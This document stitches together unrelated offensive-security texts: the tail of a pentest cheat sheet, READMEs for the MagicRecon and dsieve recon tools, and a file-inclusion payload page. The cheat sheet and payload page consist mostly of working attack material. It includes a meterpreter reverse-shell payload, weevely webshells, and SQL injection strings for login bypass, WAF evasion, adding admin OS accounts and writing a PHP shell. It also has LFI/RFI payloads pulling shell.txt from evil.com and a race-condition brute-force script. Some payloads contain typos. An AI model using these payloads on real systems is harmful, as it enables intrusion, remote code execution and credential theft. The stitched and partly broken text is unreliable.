--enumerate vp ``` --enumerate vp: Specifies the enumeration of vulnerable plugins. #### Create meterpreter php payload and encode using msfvenom ```sh msfvenom -p php/meterpreter/reverse_tcp LHOST=[IP Address of Host Machine] LPORT=4444 -f raw ``` Upload and open the file in the web server... ```sh use exploit/multi/handler set payload php/meterpreter/reverse_tcp set LHOST [IP Address of Host Machine] set LPORT 4444 run ``` #### Webshell using weevely ```sh weevely generate [PASSWORD] [FILE PATH] ``` Upload the shell to the web server... ```sh weevely http://10.10.10.16:8080/dvwa/hackable/uploads/shell.php [PASSWORD] ``` ### SQL Injection #### Try to bypass website login forms ```sh admin' -- ``` ```sh admin' # ``` ```sh admin'/* ``` ```sh ' or 1=1-- ``` ```sh ' or 1=1# ``` ```sh ' or 1=1/* ``` ```sh ') or '1'='1-- ``` ```sh ') or ('1'='1-- ``` ```sh ' UNION SELECT 1,'anotheruser','any password', 1-- ``` #### Union ##### Extract data ```sh blah' UNION SELECT 0, username, password, 0 from users -- ``` ##### Extract database name ```sh 1 UNION SELECT ALL 1,DB_NAME,3,4-- ``` ##### Extract database tables ```sh 1 UNION SELECT ALL 1,TABLE_NAME,3,4 from sysobjects where xtype=char(85)-- ``` ##### Extract table column names ```sh 1 UNION SELECT ALL 1,column_name,3,4 form DB_NAME.information_schema.columns where table_name='EMPLOYEE_TABLE'-- ``` ##### Extract first field data ```sh 1 UNION SELECT ALL 1COLUMN-NAME-1,3,4 from EMPLOYEE_NAME -- ``` #### Perform error based SQL Injection ##### Extract database name ```sh 1 or 1=convert(int,(DB_NAME))-- ``` ##### Extract first database table ```sh 1 or 1=convert(int,(select top 1 name from sysobjects where xtype=char(85))) ``` ##### Extract first table column name ```sh 1 or 1=convert(int, (select top 1 column_name from DBNAME.information_scherma.columns where table_name='TABLE-NAME-1'))-- ``` ##### Extract first field of first row ```sh 1 or 1=convert(int, (select top 1 COLUMN-NAME-1 from TABLE-NAME-1))-- ``` #### Extract database user ##### Check for username length ```sh 1; IF (KEN(USER)=1) WAITFOR DELAY '00:00:10'-- 1; IF (KEN(USER)=2) WAITFOR DELAY '00:00:10'-- 1; IF (KEN(USER)=3) WAITFOR DELAY '00:00:10'-- ... ``` ##### Check if first character in the username contains 'A' (a=97), 'B', or 'C' and so on ```sh 1; IF (ASCII(lower(substring((USER),1,1)))=97) WAITFOR DELAY '00:00:5'-- 1; IF (ASCII(lower(substring((USER),1,1)))=98) WAITFOR DELAY '00:00:5'-- 1; IF (ASCII(lower(substring((USER),1,1)))=99) WAITFOR DELAY '00:00:5'-- ... ``` ##### Check if second character in the username contains 'A' (a=97), 'B', or 'C' and so on ```sh 1; IF (ASCII(lower(substring((USER),2,1)))=97) WAITFOR DELAY '00:00:5'-- 1; IF (ASCII(lower(substring((USER),2,1)))=98) WAITFOR DELAY '00:00:5'-- 1; IF (ASCII(lower(substring((USER),2,1)))=99) WAITFOR DELAY '00:00:5'-- ... ``` ##### Check if third character in the username contains 'A' (a=97), 'B', or 'C' and so on ```sh 1; IF (ASCII(lower(substring((USER),3,1)))=97) WAITFOR DELAY '00:00:5'-- 1; IF (ASCII(lower(substring((USER),3,1)))=98) WAITFOR DELAY '00:00:5'-- 1; IF (ASCII(lower(substring((USER),3,1)))=99) WAITFOR DELAY '00:00:5'-- ... ``` #### Bypass firewall ##### Normalization method ```sh 1/*union*/union/*select*/select+1,2,3/* ``` ```sh '/**/UN/**/ION/**/SEL/**/ECT/**/password/**/FR/**/OM/**/Users/**/WHE/**/RE/**/username/**/LIKE/**/'admin'-- ``` ###### Evading ' OR 1=1 signature ```sh 'OR 'john'='john' ``` ```sh 'OR 8 > 4 ``` ```sh 'OR 5 BETWEEN 4 AND 6 ``` ```sh 'OR 'apple'='app'+'le' ``` ```sh 'OR 'software like 'soft%'' ``` ```sh 'OR 'asd'>'a' ``` ```sh 'OR 'movies'=N'movies' ``` ```sh 'OR 'blabla' IN ('blabla') ``` ##### Character enconding ###### Load files in unions (string="/etc/passwd") ```sh ' union select 1,(load_file(char(47,101,116,99,47,112,97,115,115,119,100))),1,1,1; ``` ###### Inject without quotes (string = "%") ```sh ' or username like char(37) ``` ###### Inject without quotes (string = "root") ```sh ' union select * from users where login = char(114,111,111,116); ``` ###### Check for existing files (string = "n.ext") ```sh ' and 1( if((load_file(char(110,46,101,120,116))<>char(39,39))1,0)); ``` ##### HPP technique Override the HTTP GET/POST parameters by injecting delimiting characters into the query strings. ```sh 1;select+1&id=2,3+from+users+where+id=1-- ``` ##### HPF technique ```sh 1+union/*&b=*/select+1,2 1+union/*&b=*/select+1,pass/*&c=*/from+users-- ``` ##### Blind SQL Injection Replace WAF signatures with their synonyms using SQL function. ```sh 1+OR=0x50=0x50 1+and+ascii(lower(mid((select+pwd+from+users+limit+1,1),1,1)))=74 ``` ##### String concatenation ###### MSSQL ```sh '; EXEC ('DRO' + 'P T' + 'AB' + 'LE') ``` ###### Oracle ```sh '; EXECUTE IMMEDIATE 'SEL' || 'ECT US' || 'ER' ``` ###### MySQL ```sh '; EXECUTE CONCAT('INSE','RT US','ER')' ``` ##### Manipulating white spaces ```sh UNION SELECT ``` ```sh 'OR'1'='1' ``` ##### Null byte ```sh %00' UNION SELECT Password FROM Users WHERE UserName='admin'--' ``` ##### Case variation ```sh UnIoN SeLeCt PasSWord fRoM UsErS WhEre useRNAme='JoHn' ``` ##### Declare variable ```sh ; declare @sqlvar nvarchar(70); set @sqlvar = (N'UNI' + N'ON' + N' SELECT' + N'Password'); EXEC(@sqlvar) ``` #### Exporting a value with regular expression attack ##### Exporting a value in MySQL ###### Check if first character in password is between 'a' and 'g' ```sh 2 and 1=(SELECT 1 FROM UserInfo WHERE Password REGEXP '^[a-g]' AND ID=2) ``` ###### Check if first character in password is between 'a' and 'h' ```sh 2 and 1=(SELECT 1 FROM UserInfo WHERE Password REGEXP '^[a-h]' AND ID=2) ``` ###### Check if first character in password is between 'd' and 'f' ```sh 2 and 1=(SELECT 1 FROM UserInfo WHERE Password REGEXP '^[d-f]' AND ID=2) ``` ###### Check if first character in password is 'e' ```sh 2 and 1=(SELECT 1 FROM UserInfo WHERE Password REGEXP '^[e]' AND ID=2) ``` ##### Exporting a value in MSSQL ###### Check if second character in password is between 'a' and 'f' ```sh 2 and 1=(SELECT 1 FROM UserInfo WHERE Password LIKE 'd[a-f]%' AND ID=2) ``` ###### Check if second character in password is between '0' and '9' ```sh 2 and 1=(SELECT 1 FROM UserInfo WHERE Password LIKE 'd[0-9]%' AND ID=2) ``` ###### Check if second character in password is '4' ```sh 2 and 1=(SELECT 1 FROM UserInfo WHERE Password LIKE 'd[4]%' AND ID=2) ``` #### Creating database accounts ##### MySQL ```sh INSERT INTO mysql.user (user, host, password) VALUES ('john', 'localhost', PASSWORD('toor')) ``` ##### Microsoft Access ```sh CREATE USER john IDENTIFIED BY 'toor' ``` ##### Microsoft SQL Server ```sh exec sp_addlogin 'john', 'toor' exec sp_addsrvrolemember 'john', 'sysadmin' ``` ##### Oracle ```sh CREATE USER john IDENTIFIED BY toor TEMPORATY TABLESPACE temp DEFAULT TABLESPACE users; GRANT CONNECT TO john; GRANT RESOURCE TO john; ``` #### Interacting with the operating system ##### Creating OS accounts in MSSQL ###### Create user ```sh ';exec master..xp_cmdshell "net user john toor /add";-- ``` ###### Put new user into the administrators group ```sh ';exec master..xp_cmdshell "net localgroup administrators john /add";-- ``` #### Interacting with the file system ##### Loading a file ```sh NULL UNION ALL SELECT LOAD_FILE('/etc/password')/* ``` ##### Writing a file ```sh NULL UNION ALL SELECT NULL,NULL,NULL,NULL,'<?php system($_GET["command"]);?>' INTO OUTFILE '/var/www/custom_path/shell.php'/* ``` #### Manage data ##### MSSQL ###### Inserting a row ```sh 1';insert into users values ('john','toor'); -- ``` ###### Creating a database ```sh 1';create database mydatabase; -- ``` ###### Deleting a database ```sh 1'; DROP DATABASE mydatabase; -- ``` ###### Deleting a table ```sh 1'; DROP TABLE users; -- ``` #### Using sqlmap ##### SQL Injection in a page using a cookie, retrieve databases ```sh sqlmap -u "[HOST]" --cookie="[COOKIE]" --dbs ``` -u: Specifies the target URL. --cookie: Specifies the HTTP cookie header value. --dbs: Enumerates DBMS databases. ##### Choose a database and retrieve the tables ```sh sqlmap -u "[HOST]" --cookie="[COOKIE]" -D [DATABASE] --tables ``` ##### Retrieve the rows in a table ```sh sqlmap -u "[HOST]" --cookie="[COOKIE]" -D [DATABASE] -T [TABLE] --dump ``` ##### Getting a shell ```sh sqlmap -u "[HOST]" --cookie="[COOKIE]" --os-shell ``` #### Using DSSS ##### SQL Injection in a page using a cookie, retrieve databases ```sh python3 dsss.py -u "[HOST]" --cookie="[COOKIE]" ``` -u: Specifies the target URL. --cookie: Specifies the HTTP cookie header value.
<h1 align="center"> <br> <a href="https://github.com/robotshell/magicRecon"><img src="https://github.com/robotshell/magicRecon/blob/master/images/logo.png" alt="magicRecon"></a> <br> MagicRecon: Fast, simple and effective <br> </h1> <p align="center"> <a href="https://github.com/robotshell/magicRecon/releases"> <img src="https://img.shields.io/github/v/release/robotshell/magicrecon?include_prereleases"> </a> <a href="https://www.gnu.org/licenses/gpl-3.0.en.html"> <img src="https://img.shields.io/github/license/robotshell/magicrecon"> </a> <a href="https://github.com/robotshell/magicRecon/issues?q=is%3Aissue+is%3Aclosed"> <img src="https://img.shields.io/github/issues-closed/robotshell/magicrecon"> </a> <a href="https://github.com/robotshell/magicRecon/commits/master"> <img src="https://img.shields.io/github/last-commit/robotshell/magicrecon"> </a> <a href="https://github.com/robotshell/magicRecon/commits/master"> <img src="https://img.shields.io/github/languages/code-size/robotshell/magicrecon"> </a> <a href=""> <img src="https://img.shields.io/twitter/follow/robotshelld?style=social"> </a> </p> Hi hacker 😉 Welcome to the MagicRecon tool repository! MagicRecon is a powerful shell script to maximize the recon and data collection process of an objective and finding common vulnerabilities, all this saving the results obtained in an organized way in directories and with various formats. With Magic Recon you can perform passive and active reconnaissance, vulnerability analysis, subdomain scan and many more! ------------------------------------- # Disclaimer :warning: **The author of this document take no responsibility for correctness. This project is merely here to help guide security researchers towards determining whether something is vulnerable or not, but does not guarantee accuracy.** **Warning: This code was originally created for personal use, it generates a substantial amount of traffic, please use with caution.** ------------------------------------- # Main features :boom: - Save the results in an organized way in different formats. - Subdomain enumeration. - Check if the domains are alive. - Get whois information about every subdomain. - Get dns information about every subdomain. - Extract the technologies used in the domain. - Get information about the certificate used in the domain . - Take a screenshot on the domain. - Searches for emails on the domain, users and more things. - Enumerate public resources in AWS, Azure, and Google Cloud. - Search juicy information via GitHub Dorks. - Check all entrys in robots.txt file. - Get all endpoints on the web. - Perform a parameter scan. - Perform a port scan to discover open ports. - Perform a dirsearch to find directories and files. - Check if is possible to bypass 403 HTTP status code. - Perform a massive recon and vulnerability scan via Nuclei every X seconds. - Search missing security headers. - Check if the domain is vulnerable to Email spoofing. - Check if the domain is vulnerable to Subdomain takeover. - Check if the domain is vulnerable to Cross-Origin Resource Sharing (CORS). - Check if different endpoints are vulnerable to CSRF. - Look for entry points in the URL and check if it is vulnerable to Open Redirect. - Look for entry points in the URL and check if it is vulnerable to Cross-site scripting (XSS). - Look for entry points in the URL and check if it is vulnerable to SQL Injection (SQLi). - Look for entry points in the URL and check if it is vulnerable to Server-side request forgery (SSRF). - Search all JS files in the domain and perform a scan for API Keys, access tokens, endpoints, etc. - Check if the domain use a CMS and scan it. - And many more... ------------------------------------- # Installation :hammer: ```bash $ git clone https://github.com/robotshell/magicRecon $ cd magicRecon $ chmod +x install.sh $ ./install.sh ``` ------------------------------------- # Configuration :wrench: To configure MagicRecon tool you must open the `configuration.cfg` file and change variables defined by user data. It is also important to correctly configure tools such as `Subfinder` and `Notify` to guarantee the correct functioning of magicRecon. ------------------------------------- # Usage :eyes: **TARGET OPTIONS** | Parameter | Description | |------|-------------| | -d | Target domain | | -w | Wildcard domain | | -l | Target list | **MODE OPTIONS** | Parameter | Description | |------|-------------| | -a, --all | All mode - Full scan with full target recognition and vulnerability scanning | | -p, --passive | Passive reconnaissance (Footprinting) - Performs only passive recon with multiple tools | | -x, --active | Active reconnaissance (Fingerprinting) - Performs only active recon with multiple tools | | -r, --recon | Reconnaissance - Perform active and passive reconnaissance | | -v, --vulnerabilities | Vulnerabilities - Check multiple vulnerabilities in the domain/list domains | | -m, --massive | Massive recon - Massive vulnerability analysis with repetitions every X seconds | **EXTRA OPTIONS** | Parameter | Description | |------|-------------| | -n, --notify | Notify - This option is used to receive notifications via Discord, Telegram or Slack | | -h, --help | Help - Show help | ``` ./magicrecon.sh -h __ __ _ ____ | \/ | __ _ __ _(_) ___| _ \ ___ ___ ___ _ __ | |\/| |/ _` |/ _` | |/ __| |_) / _ \/ __/ _ \| '_ \ | | | | (_| | (_| | | (__| _ < __/ (_| (_) | | | | |_| |_|\__,_|\__, |_|\___|_| \_\___|\___\___/|_| |_| |___/ MagicRecon v.3.0 - Open Source Project | Author: Robotshell | Twitter: @robotshelld USAGE ./magicrecon.sh [-d domain.com] [-w domain.com] [-l listdomains.txt] [-a] [-p] [-x] [-r] [-v] [-m] [-n] [-h] TARGET OPTIONS -d domain.com Target domain -w domain.com Wildcard domain -l list.txt Target list MODE OPTIONS -a, --all All mode - Full scan with full target recognition and vulnerability scanning -p, --passive Passive reconnaissance (Footprinting) - Performs only passive recon with multiple tools -x, --active Active reconnaissance (Fingerprinting) - Performs only active recon with multiple tools -r, --recon Reconnaissance - Perform active and passive reconnaissance -v, --vulnerabilities Vulnerabilities - Check multiple vulnerabilities in the domain/list domains -m, --massive Massive recon - Massive vulnerability analysis with repetitions every X seconds EXTRA OPTIONS -n, --notify Notify - This option is used to receive notifications via Discord, Telegram or Slack -h, --help Help - Show this help ``` ------------------------------------- # Example Usage :speak_no_evil: All: ``` ./magicrecon.sh -d domain.com -a ``` Passive reconnaissance to a list of domains: ``` ./magicrecon.sh -l domainlist.txt -p ``` Active reconnaissance to a domain: ``` ./magicrecon.sh -d domain.com -x ``` Full reconnaissance: ``` ./magicrecon.sh -d domain.com -r ``` Full reconnaissance and vulnerabilities scanning: ``` ./magicrecon.sh -d domain.com -r -v ``` Full reconnaissance and vulnerabilities scanning to a wildcard: ``` ./magicrecon.sh -w domain.com ``` Massive reconnaissance and vulnerabilities scanning: ``` ./magicrecon.sh -w domain.com -m ``` ------------------------------------- # Sample video: passive reconnaissance :movie_camera: ![Example image](https://github.com/robotshell/magicRecon/blob/master/images/poc.gif) ------------------------------------- # To do :mage_man: - [x] Change tool operation to parameters. - [x] Improve the use of Notify. - [ ] Add new interesting tools to find more vulnerabilities. - [ ] Save results in other formats. - [ ] Save the results in a document as a report. - [ ] Check if the emails found by the tool are leaked. - [x] Integrate RobotScraper. ------------------------------------- # Contribution & License :family: You can contribute in following ways: - [Report bugs & add issues](https://github.com/robotshell/magicRecon/issues). - Fix something and open a pull request. - Give suggestions **(Ideas)** to make it better. - Spread the word. Do you want to have a conversation in private? email me : [email protected] ***MagicRecon*** is licensed under [GPL-3.0 License](https://github.com/robotshell/magicRecon/blob/master/LICENSE) ------------------------------------- # Special thanks * Special Thanks to Mohd Shibli for his great contributions in the article [Fasten your Recon process using Shell Scripting](https://medium.com/bugbountywriteup/fasten-your-recon-process-using-shell-scripting-359800905d2a#id_token=eyJhbGciOiJSUzI1NiIsImtpZCI6ImRiMDJhYjMwZTBiNzViOGVjZDRmODE2YmI5ZTE5NzhmNjI4NDk4OTQiLCJ0eXAiOiJKV1QifQ.eyJpc3MiOiJodHRwczovL2FjY291bnRzLmdvb2dsZS5jb20iLCJuYmYiOjE1NzQxODIxNTUsImF1ZCI6IjIxNjI5NjAzNTgzNC1rMWs2cWUwNjBzMnRwMmEyamFtNGxqZGNtczAwc3R0Zy5hcHBzLmdvb2dsZXVzZXJjb250ZW50LmNvbSIsInN1YiI6IjEwNjQzNTQ3NTE5MTA1NzIzOTYzOSIsImVtYWlsIjoicm9ib3RzaGVsbGRAZ21haWwuY29tIiwiZW1haWxfdmVyaWZpZWQiOnRydWUsImF6cCI6IjIxNjI5NjAzNTgzNC1rMWs2cWUwNjBzMnRwMmEyamFtNGxqZGNtczAwc3R0Zy5hcHBzLmdvb2dsZXVzZXJjb250ZW50LmNvbSIsIm5hbWUiOiJSb2JvdCBTaGVsbCIsInBpY3R1cmUiOiJodHRwczovL2xoMy5nb29nbGV1c2VyY29udGVudC5jb20vYS0vQUF1RTdtQnhZZklJNndVLXQ5OVNxbzFlaElpc1E4dzY4a2VJbWZrbE4yOD1zOTYtYyIsImdpdmVuX25hbWUiOiJSb2JvdCIsImZhbWlseV9uYW1lIjoiU2hlbGwiLCJpYXQiOjE1NzQxODI0NTUsImV4cCI6MTU3NDE4NjA1NSwianRpIjoiODYzMTNhZTQ3YTQ5NjJiNTdhMTBlZDA0NGJhYWUyMGQwZWM2Y2FlNCJ9.obOev9FLt7DWW2NbSIbFwPoUC-vNFrf5nru--6uL6knW1S6CjjqXAP_D0sedfukNC0DcJnqQDz88Yh48ECppB4wEv0ozgunc9Yx24m5OiNaEKvWr0D2WJsMsV9yN7Vxt7gJxTeVIstCLvWDYCl_1JBrDvJ2eXF4V9yamk61KCqmwoAJMjXEpwaDuzITFPIZM9V-nTpIgnsBh-BCERYqAcUc7Si0IpRAlyM9YG78va7o0Pe_zYrt4NbV8Cl--BzAzrFOfhIOxvk3CYWRfc9lrSz09TJRCEn4q-rR9v7LVIboKJAedhbkr8ShClMru8xRsdfne3fRIzV1iZxNn4GuW6A) * Special Thanks to @KingOfBugbounty for his great contributions in the repository [KingOfBugBountyTips](https://github.com/KingOfBugbounty/KingOfBugBountyTips) * [@TomNomNom](https://twitter.com/TomNomNom) * [@pdiscoveryio](https://twitter.com/pdiscoveryio) * [@NahamSec](https://twitter.com/NahamSec) * [@s0md3v](https://twitter.com/s0md3v) * [@ofjaaah](https://twitter.com/ofjaaah) * [@KingOfBugbounty](https://twitter.com/KingOfBugbounty) ------------------------------------- # About me [Twitter](https://twitter.com/robotshelld) ------------------------------------- # Useful? :thinking: * If you've earned a bug bounty using this tool, please consider donating to support it's development. You can help me to develop more useful scripts and tools. Thanks! :heart_eyes: <p align="center"> <a href="https://www.buymeacoffee.com/robotshell" target="_blank"> <img src="https://www.buymeacoffee.com/assets/img/custom_images/orange_img.png" alt="Buy Me A Coffee"> </a> <a href="https://www.paypal.com/paypalme/robotshell" target="_blank"> <img src="https://www.paypalobjects.com/digitalassets/c/website/marketing/apac/C2/logos-buttons/optimize/34_Blue_PayPal_Pill_Button.png" alt="PayPal"> </a> </p>
<h1 align="center">dsieve <a href="https://twitter.com/intent/tweet?text=dsieve%20-%20Filter%20and%20enrich%20a%20list%20of%20subdomains%20by%20level%20%40trick3st%0Ahttps%3A%2F%2Fgithub.com%2Ftrickest%2Fdsieve&hashtags=bugbounty,bugbountytips,infosec"><img src="https://img.shields.io/badge/Tweet--lightgrey?logo=twitter&style=social" alt="Tweet" height="20"/></a></h1> <h3 align="center">Filter and enrich a list of subdomains by level</h3> ![dsieve](dsieve.png "dsieve") Take a single domain or read an input file and extract unique parent domains, enrich subdomains, filter subdomains by level, or find out which subdomains have the most number of sub-subdomains (or sub-sub-subdomains or sub-sub-sub...). Dsieve supports any format of URL, with or without protocol, port, path, parameters. # Installation ## Binary Binaries are available in the [latest release](https://github.com/trickest/dsieve/releases/latest). ## Docker ``` docker run quay.io/trickest/dsieve ``` ## From source ``` go install github.com/trickest/dsieve@latest ``` # Usage ``` -f string Filter domain level. Use python slice notation to select range. Example input: foo.bar.baz.tld -f 3 bar.baz.tld -f 3: bar.baz.tld, foo.bar.baz.tld -f 2:4 baz.tld, bar.baz.tld -f :3 tld, baz.tld -i string Input url or domain -if string Input file path, one url/domain per line. -o string Output file path, optional -top int Only consider top X subdomains of a certain level and return all their subdomains ``` Domains can be passed through stdin as well. ``` cat domains.txt | dsieve -f 2 ``` ### Example ##### test.txt ``` a.foo.target.com b.foo.target.com c.foo.target.com a.bar.target.com b.bar.target.com a.baz.target.com ``` ```shell script # All levels by default $ dsieve -if test.txt a.foo.target.com foo.target.com target.com b.foo.target.com c.foo.target.com a.bar.target.com bar.target.com b.bar.target.com a.baz.target.com baz.target.com # Level 2, the main domain $ dsieve -if test.txt -f 2 target.com # Level 3, one level above the main domain $ dsieve -if test.txt -f 3 foo.target.com bar.target.com baz.target.com # Levels 2 and above, main domain and all its subdomains $ dsieve -if test.txt -f 2: a.foo.target.com foo.target.com target.com b.foo.target.com c.foo.target.com a.bar.target.com bar.target.com b.bar.target.com a.baz.target.com baz.target.com # The top one level 3 subdomain with the highest number of sub-subdomains $ dsieve -if test.txt -f 3 -top 1 foo.target.com # The top two level 3 subdomain with the highest number of sub-subdomains $ dsieve -if test.txt -f 3 -top 2 foo.target.com bar.target.com ``` # Report Bugs / Feedback We look forward to any feedback you want to share with us or if you're stuck with a problem you can contact us at [[email protected]](mailto:[email protected]). You can also create an [Issue](https://github.com/trickest/dsieve/issues/new) or pull request on the Github repository. # Where does this fit in your methodology? Dsieve is an integral part of many workflows in the Trickest store. Sign up on [trickest.com](https://trickest.com) to get access to these workflows or build your own from scratch! [<img src="./banner.png" />](https://trickest-access.paperform.co/)
# File Inclusion > The File Inclusion vulnerability allows an attacker to include a file, usually exploiting a "dynamic file inclusion" mechanisms implemented in the target application. > The Path Traversal vulnerability allows an attacker to access a file, usually exploiting a "reading" mechanism implemented in the target application ## Summary * [Tools](#tools) * [Basic LFI](#basic-lfi) * [Null byte](#null-byte) * [Double encoding](#double-encoding) * [UTF-8 encoding](#utf-8-encoding) * [Path and dot truncation](#path-and-dot-truncation) * [Filter bypass tricks](#filter-bypass-tricks) * [Basic RFI](#basic-rfi) * [LFI / RFI using wrappers](#lfi--rfi-using-wrappers) * [Wrapper php://filter](#wrapper-phpfilter) * [Wrapper zip://](#wrapper-zip) * [Wrapper data://](#wrapper-data) * [Wrapper expect://](#wrapper-expect) * [Wrapper input://](#wrapper-input) * [Wrapper phar://](#wrapper-phar) * [LFI to RCE via /proc/*/fd](#lfi-to-rce-via-procfd) * [LFI to RCE via /proc/self/environ](#lfi-to-rce-via-procselfenviron) * [LFI to RCE via upload](#lfi-to-rce-via-upload) * [LFI to RCE via upload (race)](#lfi-to-rce-via-upload-race) * [LFI to RCE via phpinfo()](#lfi-to-rce-via-phpinfo) * [LFI to RCE via controlled log file](#lfi-to-rce-via-controlled-log-file) * [LFI to RCE via PHP sessions](#lfi-to-rce-via-php-sessions) * [LFI to RCE via credentials files](#lfi-o-rce-via-credentials-files) ## Tools * [Kadimus - https://github.com/P0cL4bs/Kadimus](https://github.com/P0cL4bs/Kadimus) * [LFISuite - https://github.com/D35m0nd142/LFISuite](https://github.com/D35m0nd142/LFISuite) * [fimap - https://github.com/kurobeats/fimap](https://github.com/kurobeats/fimap) ## Basic LFI In the following examples we include the `/etc/passwd` file, check the `Directory & Path Traversal` chapter for more interesting files. ```powershell http://example.com/index.php?page=../../../etc/passwd ``` ### Null byte :warning: In versions of PHP below 5.3.4 we can terminate with null byte. ```powershell http://example.com/index.php?page=../../../etc/passwd%00 ``` ### Double encoding ```powershell http://example.com/index.php?page=%252e%252e%252fetc%252fpasswd http://example.com/index.php?page=%252e%252e%252fetc%252fpasswd%00 ``` ### UTF-8 encoding ```powershell http://example.com/index.php?page=%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd http://example.com/index.php?page=%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd%00 ``` ### Path and dot truncation On most PHP installations a filename longer than 4096 bytes will be cut off so any excess chars will be thrown away. ```powershell http://example.com/index.php?page=../../../etc/passwd............[ADD MORE] http://example.com/index.php?page=../../../etc/passwd\.\.\.\.\.\.[ADD MORE] http://example.com/index.php?page=../../../etc/passwd/./././././.[ADD MORE] http://example.com/index.php?page=../../../[ADD MORE]../../../../etc/passwd ``` ### Filter bypass tricks ```powershell http://example.com/index.php?page=....//....//etc/passwd http://example.com/index.php?page=..///////..////..//////etc/passwd http://example.com/index.php?page=/%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../etc/passwd ``` ## Basic RFI Most of the filter bypasses from LFI section can be reused for RFI. ```powershell http://example.com/index.php?page=http://evil.com/shell.txt ``` ### Null byte ```powershell http://example.com/index.php?page=http://evil.com/shell.txt%00 ``` ### Double encoding ```powershell http://example.com/index.php?page=http:%252f%252fevil.com%252fshell.txt ``` ### Bypass allow_url_include When `allow_url_include` and `allow_url_fopen` are set to `Off`. It is still possible to include a remote file on Windows box using the `smb` protocol. 1. Create a share open to everyone 2. Write a PHP code inside a file : `shell.php` 3. Include it `http://example.com/index.php?page=\\10.0.0.1\share\shell.php` ## LFI / RFI using wrappers ### Wrapper php://filter The part "php://filter" is case insensitive ```powershell http://example.com/index.php?page=php://filter/read=string.rot13/resource=index.php http://example.com/index.php?page=php://filter/convert.iconv.utf-8.utf-16/resource=index.php http://example.com/index.php?page=php://filter/convert.base64-encode/resource=index.php http://example.com/index.php?page=pHp://FilTer/convert.base64-encode/resource=index.php ``` can be chained with a compression wrapper for large files. ```powershell http://example.com/index.php?page=php://filter/zlib.deflate/convert.base64-encode/resource=/etc/passwd ``` NOTE: Wrappers can be chained multiple times using `|` or `/`: - Multiple base64 decodes: `php://filter/convert.base64-decoder|convert.base64-decode|convert.base64-decode/resource=%s` - deflate then base64encode (useful for limited character exfil): `php://filter/zlib.deflate/convert.base64-encode/resource=/var/www/html/index.php` ```powershell ./kadimus -u "http://example.com/index.php?page=vuln" -S -f "index.php%00" -O index.php --parameter page curl "http://example.com/index.php?page=php://filter/convert.base64-encode/resource=index.php" | base64 -d > index.php ``` ### Wrapper zip:// ```python echo "<pre><?php system($_GET['cmd']); ?></pre>" > payload.php; zip payload.zip payload.php; mv payload.zip shell.jpg; rm payload.php http://example.com/index.php?page=zip://shell.jpg%23payload.php ``` ### Wrapper data:// ```powershell http://example.net/?page=data://text/plain;base64,PD9waHAgc3lzdGVtKCRfR0VUWydjbWQnXSk7ZWNobyAnU2hlbGwgZG9uZSAhJzsgPz4= NOTE: the payload is "<?php system($_GET['cmd']);echo 'Shell done !'; ?>" ``` Fun fact: you can trigger an XSS and bypass the Chrome Auditor with : `http://example.com/index.php?page=data:application/x-httpd-php;base64,PHN2ZyBvbmxvYWQ9YWxlcnQoMSk+` ### Wrapper expect:// ```powershell http://example.com/index.php?page=expect://id http://example.com/index.php?page=expect://ls ``` ### Wrapper input:// Specify your payload in the POST parameters, this can be done with a simple `curl` command. ```powershell curl -X POST --data "<?php echo shell_exec('id'); ?>" "https://example.com/index.php?page=php://input%00" -k -v ``` Alternatively, Kadimus has a module to automate this attack. ```powershell ./kadimus -u "https://example.com/index.php?page=php://input%00" -C '<?php echo shell_exec("id"); ?>' -T input ``` ### Wrapper phar:// Create a phar file with a serialized object in its meta-data. ```php // create new Phar $phar = new Phar('test.phar'); $phar->startBuffering(); $phar->addFromString('test.txt', 'text'); $phar->setStub('<?php __HALT_COMPILER(); ? >'); // add object of any class as meta data class AnyClass {} $object = new AnyClass; $object->data = 'rips'; $phar->setMetadata($object); $phar->stopBuffering(); ``` If a file operation is now performed on our existing Phar file via the phar:// wrapper, then its serialized meta data is unserialized. If this application has a class named AnyClass and it has the magic method __destruct() or __wakeup() defined, then those methods are automatically invoked ```php class AnyClass { function __destruct() { echo $this->data; } } // output: rips include('phar://test.phar'); ``` NOTE: The unserialize is triggered for the phar:// wrapper in any file operation, `file_exists` and many more. ## LFI to RCE via /proc/*/fd 1. Upload a lot of shells (for example : 100) 2. Include http://example.com/index.php?page=/proc/$PID/fd/$FD, with $PID = PID of the process (can be bruteforced) and $FD the filedescriptor (can be bruteforced too) ## LFI to RCE via /proc/self/environ Like a log file, send the payload in the User-Agent, it will be reflected inside the /proc/self/environ file ```powershell GET vulnerable.php?filename=../../../proc/self/environ HTTP/1.1 User-Agent: <?=phpinfo(); ?> ``` ## LFI to RCE via upload If you can upload a file, just inject the shell payload in it (e.g : `<?php system($_GET['c']); ?>` ). ```powershell http://example.com/index.php?page=path/to/uploaded/file.png ``` In order to keep the file readable it is best to inject into the metadata for the pictures/doc/pdf ## LFI to RCE via upload (race) Worlds Quitest Let's Play" * Upload a file and trigger a self-inclusion. * Repeat 1 a shitload of time to: * increase our odds of winning the race * increase our guessing odds * Bruteforce the inclusion of /tmp/[0-9a-zA-Z]{6} * Enjoy our shell. ```python import itertools import requests import sys print('[+] Trying to win the race') f = {'file': open('shell.php', 'rb')} for _ in range(4096 * 4096): requests.post('http://target.com/index.php?c=index.php', f) print('[+] Bruteforcing the inclusion') for fname in itertools.combinations(string.ascii_letters + string.digits, 6): url = 'http://target.com/index.php?c=/tmp/php' + fname r = requests.get(url) if 'load average' in r.text: # <?php echo system('uptime'); print('[+] We have got a shell: ' + url) sys.exit(0) print('[x] Something went wrong, please try again') ``` ## LFI to RCE via phpinfo() PHPinfo() displays the content of any variables such as **$_GET**, **$_POST** and **$_FILES**. > By making multiple upload posts to the PHPInfo script, and carefully controlling the reads, it is possible to retrieve the name of the temporary file and make a request to the LFI script specifying the temporary file name. Use the script phpInfoLFI.py (also available at https://www.insomniasec.com/downloads/publications/phpinfolfi.py) Research from https://www.insomniasec.com/downloads/publications/LFI%20With%20PHPInfo%20Assistance.pdf ## LFI to RCE via controlled log file Just append your PHP code into the log file by doing a request to the service (Apache, SSH..) and include the log file. ```powershell http://example.com/index.php?page=/var/log/apache/access.log http://example.com/index.php?page=/var/log/apache/error.log http://example.com/index.php?page=/var/log/nginx/access.log http://example.com/index.php?page=/var/log/nginx/error.log http://example.com/index.php?page=/var/log/vsftpd.log http://example.com/index.php?page=/var/log/sshd.log 